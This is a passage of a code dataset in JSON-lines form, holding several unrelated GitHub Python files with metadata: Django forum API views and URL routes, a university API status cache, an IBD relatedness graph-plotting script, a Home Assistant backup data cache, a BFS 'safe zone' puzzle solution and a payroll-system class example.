error_code.WENAP_LOGIN_SUCCESS,\n \"description\": \"校務系統\"\n },\n {\n \"service\": \"bus\",\n \"isAlive\": bus_test.get() is error_code.BUS_USER_WRONG_CAMPUS_OR_NOT_FOUND_USER,\n \"description\": \"校車系統\"\n },\n {\n \"service\": \"leave\",\n \"isAlive\": leave_test.get() is 100,\n \"description\": \"缺曠系統\"\n },\n {\n \"service\": \"library\",\n \"isAlive\": library_test.get()is 100,\n \"description\": \"圖書館系統\"\n }\n ]\n }\n _dumps = json.dumps(data, ensure_ascii=False)\n red_string.set(name='server_status', value=_dumps,\n ex=config.CACHE_SERVER_STATUS_EXPITE_TIME)\n\n return _dumps\n", "repo_name": "macs1207/NKUST-AP-API", "sub_path": "src/cache/api_cache.py", "file_name": "api_cache.py", "file_ext": "py", "file_size_in_byte": 2767, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "redis.StrictRedis.from_url", "line_number": 13, "usage_type": "call"}, {"api_name": "redis.StrictRedis", "line_number": 13, "usage_type": "attribute"}, {"api_name": "utils.config.REDIS_URL", "line_number": 14, "usage_type": "name"}, {"api_name": "requests.exceptions", "line_number": 27, "usage_type": "attribute"}, {"api_name": "requests.session", "line_number": 37, "usage_type": "call"}, {"api_name": "multiprocessing.pool.ThreadPool", "line_number": 38, "usage_type": "call"}, {"api_name": "crawler.bus_crawler.login", "line_number": 40, "usage_type": "attribute"}, {"api_name": "crawler.bus_crawler", "line_number": 40, "usage_type": "name"}, {"api_name": "crawler.webap_crawler.login", "line_number": 45, "usage_type": "attribute"}, {"api_name": "crawler.webap_crawler", "line_number": 45, "usage_type": "name"}, {"api_name": "utils.config.AP_GUEST_ACCOUNT", "line_number": 47, "usage_type": "attribute"}, {"api_name": "utils.config", "line_number": 47, "usage_type": "name"}, {"api_name": "utils.config.AP_GUEST_PASSWORD", "line_number": 48, "usage_type": "attribute"}, {"api_name": "utils.config", "line_number": 48, "usage_type": "name"}, {"api_name": "subprocess.check_output", "line_number": 62, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 66, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 66, "usage_type": "attribute"}, {"api_name": "utils.error_code.WENAP_LOGIN_SUCCESS", "line_number": 71, "usage_type": "attribute"}, {"api_name": "utils.error_code", "line_number": 71, "usage_type": "name"}, {"api_name": "utils.error_code.BUS_USER_WRONG_CAMPUS_OR_NOT_FOUND_USER", "line_number": 76, "usage_type": "attribute"}, {"api_name": "utils.error_code", "line_number": 76, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 91, "usage_type": "call"}, {"api_name": "utils.config.CACHE_SERVER_STATUS_EXPITE_TIME", "line_number": 93, "usage_type": "attribute"}, {"api_name": "utils.config", "line_number": 93, "usage_type": "name"}]} +{"seq_id": "32976205567", "text": "import math\n\nfrom django.db.models import Count\nfrom django.utils import timezone\nfrom rest_framework import generics, permissions\n\nfrom api import models, serializers\n\n\nclass TopicList(generics.ListCreateAPIView):\n queryset = models.Topic.objects.all()\n\n def get_throttles(self):\n if self.request.method == \"POST\":\n self.throttle_scope = \"slow\"\n return super().get_throttles()\n\n def get_serializer_class(self):\n if self.request.method == \"POST\":\n return serializers.FirstPostSerializer\n return serializers.TopicSerializer\n\n def perform_create(self, serializer):\n serializer.save(author=self.request.user.username)\n\n def list(self, request):\n response = super().list(request)\n self._append_seen_count_to_response(request, response)\n response.data[\"page_size\"] = self.paginator.page_size\n return response\n\n def _append_seen_count_to_response(self, request, response):\n ids = {topic[\"id\"] for topic in response.data[\"results\"]}\n records = dict(request.user.record_set.filter(topic__in=ids).values_list(\"topic\", \"count\"))\n for topic in response.data[\"results\"]:\n topic[\"seen_count\"] = records.get(topic[\"id\"], 0)\n topic[\"page_size\"] = self.paginator.page_size\n\n\nclass TopicDetail(generics.RetrieveDestroyAPIView):\n queryset = models.Topic.objects.all()\n serializer_class = serializers.TopicSerializer\n permission_classes = [permissions.IsAdminUser]\n\n\nclass PostList(generics.ListCreateAPIView):\n\n def get_throttles(self):\n if self.request.method == \"POST\":\n self.throttle_scope = \"slow\"\n return super().get_throttles()\n\n def get_serializer_class(self):\n if self.request.method == \"POST\":\n return serializers.ReplySerializer\n return serializers.PostListSerializer\n\n def get_queryset(self):\n topic_id = int(self.kwargs[\"topic_id\"])\n return (models.Post.objects\n .filter(topic=topic_id)\n .select_related(\"topic\")\n .order_by(\"timestamp\")\n )\n\n def perform_create(self, serializer):\n serializer.save(author=self.request.user.username, timestamp=timezone.now(), topic_id=self.kwargs[\"topic_id\"])\n\n def list(self, request, topic_id):\n response = super().list(request, topic_id)\n self._maybe_update_record(request, topic_id, response)\n self._add_topic_to_response(topic_id, response)\n self._enumerate_results(request, response)\n response.data[\"page_size\"] = self.paginator.page_size\n return response\n\n def _maybe_update_record(self, request, topic_id, response):\n page = request.query_params.get(\"page\", \"1\")\n count = min(self.paginator.page_size * int(page), response.data[\"count\"])\n record = request.user.record_set.filter(topic_id=topic_id).first()\n if not record or count > record.count:\n request.user.record_set.update_or_create(topic_id=topic_id, defaults={\"count\": count})\n\n def _add_topic_to_response(self, topic_id, response):\n topic = models.Topic.objects.get(id=topic_id)\n response.data[\"topic\"] = serializers.TopicSerializer(topic).data\n\n def _enumerate_results(self, request, response):\n for i, post in enumerate(response.data[\"results\"], 1):\n post[\"index\"] = (int(request.query_params.get(\"page\", \"1\"))-1) * self.paginator.page_size + i\n\n\nclass PostDetail(generics.RetrieveUpdateDestroyAPIView):\n serializer_class = serializers.PostDetailSerializer\n\n def get_queryset(self):\n return models.Post.objects.filter(topic_id=self.kwargs[\"topic_id\"])\n\n def get(self, request, topic_id, pk):\n response = super().get(request, topic_id, pk)\n obj = self.get_object()\n qs = self.get_queryset()\n index = list(qs).index(obj) + 1\n page = math.ceil(index/self.paginator.page_size)\n response.data[\"context\"] = {\"index\": index, \"page\": page}\n return response\n\n\nclass UserList(generics.ListAPIView):\n queryset = models.User.objects.order_by(\"id\")\n serializer_class = serializers.UserSerializer\n\n def list(self, request):\n response = super().list(request)\n for user in response.data[\"results\"]:\n qs = models.Post.objects.filter(author=user[\"username\"])\n user[\"post_count\"] = len(qs)\n return response\n", "repo_name": "RodericDay/forum", "sub_path": "api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4402, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.generics.ListCreateAPIView", "line_number": 10, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 10, "usage_type": "name"}, {"api_name": "api.models.Topic.objects.all", "line_number": 11, "usage_type": "call"}, {"api_name": "api.models.Topic", "line_number": 11, "usage_type": "attribute"}, {"api_name": "api.models", "line_number": 11, "usage_type": "name"}, {"api_name": "api.serializers.FirstPostSerializer", "line_number": 20, "usage_type": "attribute"}, {"api_name": "api.serializers", "line_number": 20, "usage_type": "name"}, {"api_name": "api.serializers.TopicSerializer", "line_number": 21, "usage_type": "attribute"}, {"api_name": "api.serializers", "line_number": 21, "usage_type": "name"}, {"api_name": "rest_framework.generics.RetrieveDestroyAPIView", "line_number": 40, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 40, "usage_type": "name"}, {"api_name": "api.models.Topic.objects.all", "line_number": 41, "usage_type": "call"}, {"api_name": "api.models.Topic", "line_number": 41, "usage_type": "attribute"}, {"api_name": "api.models", "line_number": 41, "usage_type": "name"}, {"api_name": "api.serializers.TopicSerializer", "line_number": 42, "usage_type": "attribute"}, {"api_name": "api.serializers", "line_number": 42, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAdminUser", "line_number": 43, "usage_type": "attribute"}, {"api_name": "rest_framework.permissions", "line_number": 43, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListCreateAPIView", "line_number": 46, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 46, "usage_type": "name"}, {"api_name": "api.serializers.ReplySerializer", "line_number": 55, "usage_type": "attribute"}, {"api_name": "api.serializers", "line_number": 55, "usage_type": "name"}, {"api_name": "api.serializers.PostListSerializer", "line_number": 56, "usage_type": "attribute"}, {"api_name": "api.serializers", "line_number": 56, "usage_type": "name"}, {"api_name": "api.models.Post.objects.filter", "line_number": 60, "usage_type": "call"}, {"api_name": "api.models.Post", "line_number": 60, "usage_type": "attribute"}, {"api_name": "api.models", "line_number": 60, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 67, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 67, "usage_type": "name"}, {"api_name": "api.models.Topic.objects.get", "line_number": 85, "usage_type": "call"}, {"api_name": "api.models.Topic", "line_number": 85, "usage_type": "attribute"}, {"api_name": "api.models", "line_number": 85, "usage_type": "name"}, {"api_name": "api.serializers.TopicSerializer", "line_number": 86, "usage_type": "call"}, {"api_name": "api.serializers", "line_number": 86, "usage_type": "name"}, {"api_name": "rest_framework.generics.RetrieveUpdateDestroyAPIView", "line_number": 93, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 93, "usage_type": "name"}, {"api_name": "api.serializers.PostDetailSerializer", "line_number": 94, "usage_type": "attribute"}, {"api_name": "api.serializers", "line_number": 94, "usage_type": "name"}, {"api_name": "api.models.Post.objects.filter", "line_number": 97, "usage_type": "call"}, {"api_name": "api.models.Post", "line_number": 97, "usage_type": "attribute"}, {"api_name": "api.models", "line_number": 97, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 104, "usage_type": "call"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 109, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 109, "usage_type": "name"}, {"api_name": "api.models.User.objects.order_by", "line_number": 110, "usage_type": "call"}, {"api_name": "api.models.User", "line_number": 110, "usage_type": "attribute"}, {"api_name": "api.models", "line_number": 110, "usage_type": "name"}, {"api_name": "api.serializers.UserSerializer", "line_number": 111, "usage_type": "attribute"}, {"api_name": "api.serializers", "line_number": 111, "usage_type": "name"}, {"api_name": "api.models.Post.objects.filter", "line_number": 116, "usage_type": "call"}, {"api_name": "api.models.Post", "line_number": 116, "usage_type": "attribute"}, {"api_name": "api.models", "line_number": 116, "usage_type": "name"}]} +{"seq_id": "25641054385", "text": "import sys, os\nimport numpy as np\nimport pandas as pd\nimport scipy.sparse\nimport networkx as nx\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nimport argparse\n\n\nclass IBDtoGraph:\n def __init__(self, ibd_file=None, ibd_array=None):\n assert not (ibd_file and ibd_array)\n assert (ibd_file or ibd_array)\n \n self.pairwise_total_ibd_array = None\n self.ninds = None\n self.pos = None\n self.graph_params = None\n \n self.ibd_array = ibd_array\n if ibd_file is not None:\n self.ibd_array = np.load(ibd_file)['ibd_array']\n \n self.ibd_df = pd.DataFrame(self.ibd_array, columns=['ind1', 'ind2', 'start', 'end'])\n self.ibd_df['len'] = self.ibd_df['end'] - self.ibd_df['start']\n \n # Could check inds are all ints first\n self.inds = list(set(self.ibd_df[['ind1', 'ind2']].values.astype(int).ravel()))\n self.ninds = max(self.inds)\n \n def set_pairwise_total_IBD(self, maxrows=None, input_file=None, output_file=None):\n self.pairwise_total_ibd_array = scipy.sparse.lil_matrix((self.ninds + 1, self.ninds + 1))\n\n if input_file:\n assert output_file is not None\n self.pairwise_total_ibd_array = scipy.sparse.load_npz(input_file).tolil()\n return\n \n for i, row in tqdm(self.ibd_df.iterrows(), total=self.ibd_df.shape[0]):\n ind1, ind2 = sorted([int(row.ind1), int(row.ind2)])\n self.pairwise_total_ibd_array[ind1, ind2] += row.len\n if maxrows is not None and i > maxrows:\n break\n\n if output_file:\n scipy.sparse.save_npz(output_file, self.pairwise_total_ibd_array.tocoo())\n \n def build_graph(self, k=None, iterations=None, outfile=None):\n G = nx.Graph()\n coo = self.pairwise_total_ibd_array.tocoo()\n max_len = coo.data.max()\n for r, c, d in zip(coo.row, coo.col, coo.data):\n G.add_edge(r, c, weight=d / max_len)\n \n if outfile is not None:\n nx.nx_pydot.write_dot(G, os.path.expanduser(outfile))\n \n self.graph_params = {'k': k, 'iterations': iterations}\n pos = nx.spring_layout(G, k=k, iterations=iterations)\n self.pos = np.vstack(list(pos.values()))\n \n def plot_graph(self, outfile=None, **plot_args):\n if self.pos is None:\n raise ValueError(\"Must run 'build_graph' before plotting!\")\n \n p_args = {'s': 1, 'alpha': 0.5}\n for k, v in plot_args.items():\n p_args[k] = v\n \n plt.scatter(self.pos[:, 0], self.pos[:, 1], **p_args)\n plt.title(str(self.graph_params['iterations']) + ' iterations')\n \n if outfile:\n plt.savefig(os.path.expanduser(outfile))\n \n try:\n plt.show()\n except:\n pass\n \n\ndef main(args):\n ibd_file = os.path.expanduser(args.ibd_file)\n plot_file = os.path.expanduser(args.plot_file)\n\n pairwise_total_ibd_input = None\n if args.pairwise_total_ibd_input:\n pairwise_total_ibd_input = os.path.expanduser(args.pairwise_total_ibd_input)\n\n pairwise_total_ibd_output = None\n if args.pairwise_total_ibd_output:\n pairwise_total_ibd_output = os.path.expanduser(args.pairwise_total_ibd_output)\n\n I = IBDtoGraph(ibd_file=ibd_file)\n I.set_pairwise_total_IBD(maxrows=args.max_rows, input_file=pairwise_total_ibd_input,\n output_file=pairwise_total_ibd_output)\n I.build_graph(iterations=args.iterations, k=args.point_spread)\n I.plot_graph(alpha=args.plot_alpha, outfile=plot_file)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--ibd_file\", required=True)\n parser.add_argument(\"-o\", \"--plot_file\", required=True)\n parser.add_argument(\"-p\", \"--pairwise_total_ibd_input\")\n parser.add_argument(\"-s\", \"--pairwise_total_ibd_output\")\n parser.add_argument(\"-a\", \"--plot_alpha\", type=float, default=0.5)\n parser.add_argument(\"-m\", \"--max_rows\", type=int)\n parser.add_argument(\"-k\", \"--point_spread\", type=float)\n parser.add_argument(\"-t\", \"--iterations\", type=int, default=50)\n\n args = parser.parse_args()\n main(args)\n", "repo_name": "DomNelson/wf_coalescent", "sub_path": "scripts/plot_graph_ibd.py", "file_name": "plot_graph_ibd.py", "file_ext": "py", "file_size_in_byte": 4304, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.use", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 27, "usage_type": "call"}, {"api_name": "scipy.sparse.sparse.lil_matrix", "line_number": 35, "usage_type": "call"}, {"api_name": "scipy.sparse.sparse", "line_number": 35, "usage_type": "attribute"}, {"api_name": "scipy.sparse", "line_number": 35, "usage_type": "name"}, {"api_name": "scipy.sparse.sparse.load_npz", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.sparse.sparse", "line_number": 39, "usage_type": "attribute"}, {"api_name": "scipy.sparse", "line_number": 39, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 42, "usage_type": "call"}, {"api_name": "scipy.sparse.sparse.save_npz", "line_number": 49, "usage_type": "call"}, {"api_name": "scipy.sparse.sparse", "line_number": 49, "usage_type": "attribute"}, {"api_name": "scipy.sparse", "line_number": 49, "usage_type": "name"}, {"api_name": "networkx.Graph", "line_number": 52, "usage_type": "call"}, {"api_name": "networkx.nx_pydot.write_dot", "line_number": 59, "usage_type": "call"}, {"api_name": "networkx.nx_pydot", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "networkx.spring_layout", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.show", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 105, "usage_type": "call"}]} +{"seq_id": "41236474648", "text": "from datetime import timedelta\nfrom enum import Enum, unique\nfrom backup.config import Config, Setting, VERSION, Version\nfrom backup.file import JsonFileSaver\nfrom backup.const import NECESSARY_OLD_BACKUP_PLURAL_NAME\nfrom injector import inject, singleton\nfrom ..time import Time\nfrom typing import Dict\nimport json\nimport os\n\nKEY_I_MADE_THIS = \"i_made_this\"\nKEY_PENDING = \"pending\"\nKEY_CREATED = \"created\"\nKEY_IGNORE = \"ignore\"\nKEY_LAST_SEEN = \"last_seen\"\nKEY_NAME = \"name\"\nKEY_LAST_VERSION = \"last_verison\"\nKEY_UPGRADES = \"upgrades\"\nKEY_FLAGS = \"flags\"\nKEY_NOTE = \"note\"\n\nCACHE_EXPIRATION_DAYS = 30\n\nVERSION_DEFUALT_IGNORE_UPGRADES = Version.parse(\"0.108.2\")\n\n\n@unique\nclass UpgradeFlags(Enum):\n NOTIFIED_ABOUT_BACKUP_RENAME = \"notified_backup_rename\"\n NOTIFIED_ABOUT_IGNORED_BACKUPS = \"notified_ignored_backups\"\n NOTIFIED_ABOUT_OOB_FLOW = \"notified_about_oob_flow\"\n TESTING_FLAG = \"testing_flag\"\n\n\n@singleton\nclass DataCache:\n @inject\n def __init__(self, config: Config, time: Time):\n self._config = config\n self._data = {}\n self._dirty = {}\n self._time = time\n self._last_version = Version.default()\n self._first_version = Version.default()\n self._flags = set()\n self._load()\n\n def _load(self):\n path = self._config.get(Setting.DATA_CACHE_FILE_PATH)\n if not JsonFileSaver.exists(path):\n self._data = {NECESSARY_OLD_BACKUP_PLURAL_NAME: {}}\n else:\n self._data = JsonFileSaver.read(path)\n\n # Check for an upgrade.\n if KEY_LAST_VERSION in self._data:\n self._last_version = Version.parse(self._data[KEY_LAST_VERSION])\n if self.previousVersion != self.currentVersion:\n # add an upgrade marker\n if KEY_UPGRADES not in self._data:\n self._data[KEY_UPGRADES] = []\n self._data[KEY_UPGRADES].append({\n 'prev_version': str(self.previousVersion),\n 'new_version': str(self.currentVersion),\n 'date': self._time.now().isoformat()\n })\n self._data[KEY_LAST_VERSION] = str(self.currentVersion)\n self.makeDirty()\n if KEY_UPGRADES not in self._data or len(self._data[KEY_UPGRADES]) == 0:\n self._first_version = self.currentVersion\n else:\n self._first_version = Version.parse(self._data[KEY_UPGRADES][0]['new_version'])\n\n if self._config.isExplicit(Setting.IGNORE_OTHER_BACKUPS) or self._config.isExplicit(Setting.IGNORE_UPGRADE_BACKUPS):\n self.addFlag(UpgradeFlags.NOTIFIED_ABOUT_IGNORED_BACKUPS)\n\n if self.notifyForIgnoreUpgrades:\n self._config.useLegacyIgnoredBehavior(True)\n\n self.saveIfDirty()\n\n def save(self, data=None):\n if data is None:\n data = self._data\n path = self._config.get(Setting.DATA_CACHE_FILE_PATH)\n JsonFileSaver.write(path, data)\n self._dirty = False\n\n def makeDirty(self):\n self._dirty = True\n\n @property\n def dirty(self) -> bool:\n return self._dirty\n\n @property\n def backups(self) -> Dict[str, Dict[str, str]]:\n if NECESSARY_OLD_BACKUP_PLURAL_NAME not in self._data:\n self._data[NECESSARY_OLD_BACKUP_PLURAL_NAME] = {}\n return self._data[NECESSARY_OLD_BACKUP_PLURAL_NAME]\n\n def backup(self, slug) -> Dict[str, str]:\n if slug not in self.backups:\n self.backups[slug] = {}\n return self.backups[slug]\n\n def saveIfDirty(self):\n if self._dirty:\n # See if we need to remove any old entries\n for slug in list(self.backups.keys()):\n data = self.backups[slug].get(KEY_LAST_SEEN)\n if data is not None and self._time.now() > self._time.parse(data) + timedelta(days=CACHE_EXPIRATION_DAYS):\n del self.backups[slug]\n self.save()\n\n @property\n def previousVersion(self):\n return self._last_version\n\n @property\n def firstVersion(self):\n return self._first_version\n\n @property\n def currentVersion(self):\n return Version.parse(VERSION)\n\n @property\n def notifyForIgnoreUpgrades(self):\n return self.firstVersion < VERSION_DEFUALT_IGNORE_UPGRADES and not self.checkFlag(UpgradeFlags.NOTIFIED_ABOUT_IGNORED_BACKUPS) and not self._config.isExplicit(Setting.IGNORE_OTHER_BACKUPS) and not self._config.isExplicit(Setting.IGNORE_UPGRADE_BACKUPS)\n\n def checkFlag(self, flag: UpgradeFlags):\n return flag.value in self._data.get(KEY_FLAGS, [])\n\n def TESTS_ONLY_clearFlags(self):\n self._data[KEY_FLAGS] = []\n\n def addFlag(self, flag: UpgradeFlags):\n all_flags = set(self._data.get(KEY_FLAGS, []))\n all_flags.add(flag.value)\n self._data[KEY_FLAGS] = list(all_flags)\n self.makeDirty()\n\n def getUpgradeTime(self, version: Version):\n for upgrade in self._data[KEY_UPGRADES]:\n if Version.parse(upgrade['new_version']) >= version:\n return self._time.parse(upgrade['date'])\n return self._time.now()\n", "repo_name": "sabeechen/hassio-google-drive-backup", "sub_path": "hassio-google-drive-backup/backup/util/data_cache.py", "file_name": "data_cache.py", "file_ext": "py", "file_size_in_byte": 5085, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2613, "dataset": "github-code", "pt": "52", "api": [{"api_name": "backup.config.Version.parse", "line_number": 25, "usage_type": "call"}, {"api_name": "backup.config.Version", "line_number": 25, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 29, "usage_type": "name"}, {"api_name": "enum.unique", "line_number": 28, "usage_type": "name"}, {"api_name": "backup.config.Config", "line_number": 39, "usage_type": "name"}, {"api_name": "time.Time", "line_number": 39, "usage_type": "name"}, {"api_name": "backup.config.Version.default", "line_number": 44, "usage_type": "call"}, {"api_name": "backup.config.Version", "line_number": 44, "usage_type": "name"}, {"api_name": "backup.config.Version.default", "line_number": 45, "usage_type": "call"}, {"api_name": "backup.config.Version", "line_number": 45, "usage_type": "name"}, {"api_name": "injector.inject", "line_number": 38, "usage_type": "name"}, {"api_name": "backup.config.Setting.DATA_CACHE_FILE_PATH", "line_number": 50, "usage_type": "attribute"}, {"api_name": "backup.config.Setting", "line_number": 50, "usage_type": "name"}, {"api_name": "backup.file.JsonFileSaver.exists", "line_number": 51, "usage_type": "call"}, {"api_name": "backup.file.JsonFileSaver", "line_number": 51, "usage_type": "name"}, {"api_name": "backup.const.NECESSARY_OLD_BACKUP_PLURAL_NAME", "line_number": 52, "usage_type": "name"}, {"api_name": "backup.file.JsonFileSaver.read", "line_number": 54, "usage_type": "call"}, {"api_name": "backup.file.JsonFileSaver", "line_number": 54, "usage_type": "name"}, {"api_name": "backup.config.Version.parse", "line_number": 58, "usage_type": "call"}, {"api_name": "backup.config.Version", "line_number": 58, "usage_type": "name"}, {"api_name": "backup.config.Version.parse", "line_number": 73, "usage_type": "call"}, {"api_name": "backup.config.Version", "line_number": 73, "usage_type": "name"}, {"api_name": "backup.config.Setting.IGNORE_OTHER_BACKUPS", "line_number": 75, "usage_type": "attribute"}, {"api_name": "backup.config.Setting", "line_number": 75, "usage_type": "name"}, {"api_name": "backup.config.Setting.IGNORE_UPGRADE_BACKUPS", "line_number": 75, "usage_type": "attribute"}, {"api_name": "backup.config.Setting.DATA_CACHE_FILE_PATH", "line_number": 86, "usage_type": "attribute"}, {"api_name": "backup.config.Setting", "line_number": 86, "usage_type": "name"}, {"api_name": "backup.file.JsonFileSaver.write", "line_number": 87, "usage_type": "call"}, {"api_name": "backup.file.JsonFileSaver", "line_number": 87, "usage_type": "name"}, {"api_name": "backup.const.NECESSARY_OLD_BACKUP_PLURAL_NAME", "line_number": 99, "usage_type": "name"}, {"api_name": "backup.const.NECESSARY_OLD_BACKUP_PLURAL_NAME", "line_number": 100, "usage_type": "name"}, {"api_name": "backup.const.NECESSARY_OLD_BACKUP_PLURAL_NAME", "line_number": 101, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 98, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 103, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 113, "usage_type": "call"}, {"api_name": "backup.config.Version.parse", "line_number": 127, "usage_type": "call"}, {"api_name": "backup.config.VERSION", "line_number": 127, "usage_type": "argument"}, {"api_name": "backup.config.Version", "line_number": 127, "usage_type": "name"}, {"api_name": "backup.config.Setting.IGNORE_OTHER_BACKUPS", "line_number": 131, "usage_type": "attribute"}, {"api_name": "backup.config.Setting", "line_number": 131, "usage_type": "name"}, {"api_name": "backup.config.Setting.IGNORE_UPGRADE_BACKUPS", "line_number": 131, "usage_type": "attribute"}, {"api_name": "backup.config.Version", "line_number": 145, "usage_type": "name"}, {"api_name": "backup.config.Version.parse", "line_number": 147, "usage_type": "call"}, {"api_name": "backup.config.Version", "line_number": 147, "usage_type": "name"}, {"api_name": "injector.singleton", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "36317677930", "text": "from django.urls import path, include\nfrom .views import *\nfrom django.contrib.auth import views as auth_views\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nurlpatterns = [\n path('', index, name='index'),\n path('about/', about, name='about'),\n path('register', register, name='register'),\n path('login/', auth_views.LoginView.as_view(template_name='login.html'), name='login'),\n path('/', auth_views.LogoutView.as_view(template_name='logout.html'), name='logout'),\n path('profile/', profile, name='profile'),\n path('profile/work', profile_work, name='profile_work'),\n path('profile/new', profile_new, name='profile_new'),\n path('profile/done', profile_done, name='profile_done'),\n path('profile/create/', create, name='create'),\n path('profile/delete/', delete, name='delete'),\n\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n", "repo_name": "danyaus777/django", "sub_path": "main/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 917, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LoginView.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LoginView", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.views", "line_number": 11, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView.as_view", "line_number": 12, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.views", "line_number": 12, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "django.conf.urls.static.static", "line_number": 20, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 20, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 20, "usage_type": "attribute"}]} +{"seq_id": "5875692880", "text": "# 2468 - 안전영역\nfrom collections import deque\nimport sys\nn = int(input())\n\n# 초기 리스트 입력\narray = []\nmax_value = -1e9\nfor _ in range(n):\n element = list(map(int, input().split()))\n array.append(element)\n max_value = max(max_value, max(element))\n\ndx = [-1,1,0,0]\ndy = [0,0,-1,1]\n\ndef bfs(x,y,k, visited):\n queue = deque([(x,y)])\n\n while queue:\n x, y = queue.popleft()\n visited[x][y] = True\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0<=nx k:\n queue.append((nx,ny))\n visited[nx][ny] = True\n # x, y = nx, ny\n\nresult = 0\nfor k in range(max_value):\n visited = [[False] * n for _ in range(n)]\n cnt = 0\n for i in range(n):\n for j in range(n):\n if visited[i][j] == False and array[i][j] > k:\n bfs(i,j,k, visited)\n cnt+=1\n\n if result float:\n ...\n\n\nclass Employee(IEmployee):\n def __init__(self, id, name):\n self.id = id\n self.name = name\n\n\n# class Employee(ABC):\n# def __init__(self, id, name):\n# self.id = id\n# self.name = name\n\n# @abstractmethod\n# def calculate_payroll(self):\n# pass\n\n\nclass PayrollSystem:\n def calculate_payroll(self, employees: Iterable[IEmployee]):\n print(\"Calculating Payroll\")\n print(\"===================\")\n for employee in employees:\n print(f\"Payroll for: {employee.id} - {employee.name}\")\n print(f\"- Check amount: {employee.calculate_payroll()}\")\n 